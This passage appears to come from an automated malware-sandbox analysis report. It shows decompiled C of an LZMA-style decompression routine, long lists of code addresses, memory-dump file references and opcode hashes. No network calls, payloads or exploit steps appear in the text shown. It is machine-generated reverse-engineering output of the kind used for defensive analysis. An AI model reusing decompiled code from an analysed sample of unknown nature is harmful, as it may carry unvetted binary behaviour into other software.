														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                0x00000000
                                                0x00406ce2
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406cf3
                                                0x00406cfd
                                                0x00000000
                                                0x00406ce8
                                                0x00406ce8
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d36
                                                0x00406d3b
                                                0x00406c1c
                                                0x00406c1f
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00406f94
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x004071ab
                                                0x004071b3
                                                0x004071ba
                                                0x004071bc
                                                0x004071c3
                                                0x004071c7
                                                0x004071c7
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407004
                                                0x00407007
                                                0x00407007
                                                0x0040700d
                                                0x0040700d
                                                0x004067a9
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x00000000
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x00406822
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406977
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x0040698e
                                                0x00000000
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be6
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf3
                                                0x00406bf6
                                                0x00406bf9
                                                0x00406bfc
                                                0x00406bff
                                                0x00406c01
                                                0x00406c08
                                                0x00406c09
                                                0x00406c0b
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406c19
                                                0x00406bca
                                                0x00406bcd
                                                0x00406bd0
                                                0x00406bda
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00000000
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c55
                                                0x00406c58
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c34
                                                0x00406c37
                                                0x00406c3a
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406c4d
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00000000
                                                0x00406c71
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c7b
                                                0x00406c7f
                                                0x00000000
                                                0x00000000
                                                0x00406c85
                                                0x00406c87
                                                0x00406c8b
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f81
                                                0x00406f84
                                                0x00406f8e
                                                0x00406f91
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00406f91
                                                0x00406f91
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6b
                                                0x00406f6e
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x0040704f
                                                0x0040704f
                                                0x00000000
                                                0x0040704f
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x0040710c
                                                0x0040700d
                                                0x00000000
                                                0x00000000
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d62
                                                0x00406d64
                                                0x00406d64
                                                0x00406d65
                                                0x00406d68
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d80
                                                0x00000000
                                                0x00000000
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00000000
                                                0x00407065
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x00000000
                                                0x004071a1
                                                0x0040706f
                                                0x00407072
                                                0x00407075
                                                0x00407079
                                                0x0040707c
                                                0x00407082
                                                0x00407084
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708d
                                                0x0040708d
                                                0x00407091
                                                0x004070f1
                                                0x004070f4
                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00407013
                                                0x0040700d
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b1
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070e3
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00406cd3
                                                0x00406cd3
                                                0x00000000
                                                0x00406cd3
                                                0x00406f54
                                                0x00407189
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x004071c0
                                                0x004071c0
                                                0x00000000
                                                0x004071c0
                                                0x0040700d
                                                0x00406f94
                                                0x00406f91
                                                0x00000000
                                                0x00406ce6

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                                                • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
